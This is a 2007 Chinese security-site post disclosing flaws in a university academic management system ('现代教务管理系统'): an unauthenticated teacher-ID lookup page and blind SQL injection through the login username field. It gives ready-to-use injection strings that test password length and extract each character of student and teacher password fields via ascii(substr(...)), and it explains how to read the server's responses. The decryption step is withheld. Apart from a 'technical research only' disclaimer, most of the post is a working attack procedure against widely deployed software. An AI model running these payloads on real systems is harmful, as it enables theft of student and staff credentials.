栏目导航: 首页 > 漏洞预警 > 程序漏洞 > 内容

现代教务管理系统漏洞

www.hx99.net    时间: 2007-07-09    阅读: 次     整理: 华西安全网
今天,在邪八上看到一位仁兄写了对此系统的分析报告。他的文章重点在于如何方便的选课,在安全性方面没有涉及太多。在这里我把这个放出来吧。

-------------------------------------------------------------------

警告:本文只做技术研究!严禁用于非法用途!

转载请注明出处和作者!

----------------------------------------------------

anuiz、我菜我菜我菜菜[BCT]

------------------------

教师对应编号查询地址没有验证,直接输入地址即可查询。

(那个随机括号内的东西完全可以去掉)

首先把外面的东西对应数据库里面的字段列一下。

密码-mm

教师、部门-js

口令-kl

学生用的密码mm字段,教师和部门用的口令kl字段。

注入语句:(写在登陆框用户名处就ok)

1.首先判断要猜解用户的密码长度

学号'andlength(mm)>x--

职教号'andlength(kl)>x--</>

直接登录,返回密码错误则是猜解正确。

2.猜解每一位密码

学号'andascii(substr(mm,第几位,1))>xx--

职教号'andascii(substr(kl,第几位,1))>xx--

同样返回密码错误i则是猜解正确。

3.解密

数据库中的数据时经过加密的,算法和解密工具我就不发出来了,点到为止。希望对此有研究的各位大虾也不要放出解密工具来,毕竟这个东西很多高校正在使用,影响力还是有点大。 本文来源:华西安全网[http://www.hx99.net]
发表评论】【告诉QQ好友】【错误报告】【加入收藏】【关闭